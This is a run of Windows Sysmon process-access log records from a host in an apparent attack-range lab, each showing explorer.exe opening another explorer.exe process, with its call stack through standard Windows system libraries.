16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 